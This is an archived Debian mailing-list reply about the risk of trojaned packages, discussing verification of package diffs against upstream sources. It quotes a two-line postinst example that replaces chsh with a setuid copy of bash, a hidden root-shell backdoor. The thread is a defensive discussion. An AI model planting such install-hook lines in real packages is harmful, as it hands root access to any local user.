[Date Prev][Date Next] [Thread Prev][Thread Next] [Date Index] [Thread Index]

Re: First Linux Virus

'=?iso-8859-1?Q?Nicol=E1s_Lichtmaier?= wrote:'
>$ cat postinst
>cp /bin/bash /usr/bin/chsh
>chmod u+s /usr/bin/chsh
>$ _
> The file exists as setuid in other package, but now it's a shell!!!
> The only way to check this is with file cheksums...

What about my nightly cronjob:
  dpkg -i /debian/rex/binary/base/passwd_1.0-5.deb

But it's a serious problem.  I (and others) need to start verifying
that the debian diff is valid (by actually getting the upstream and
seeing if it applies correctly).  And reading the diff, before
installing to check for this sort of thing.  While we're at it, we can
check for bugs too :)

...  If only it were that easy :(

Christopher J. Fearnley            |    Linux/Internet Consulting
cjf@netaxs.com, cjf@onit.net       |    UNIX SIG Leader at PACS
http://www.netaxs.com/~cjf         |    (Philadelphia Area Computer Society)
ftp://ftp.netaxs.com/people/cjf    |    Design Science Revolutionary
"Dare to be Naive" -- Bucky Fuller |    Explorer in Universe

TO UNSUBSCRIBE FROM THIS MAILING LIST: e-mail the word "unsubscribe" to
debian-devel-REQUEST@lists.debian.org . Trouble? e-mail to Bruce@Pixar.com

Reply to: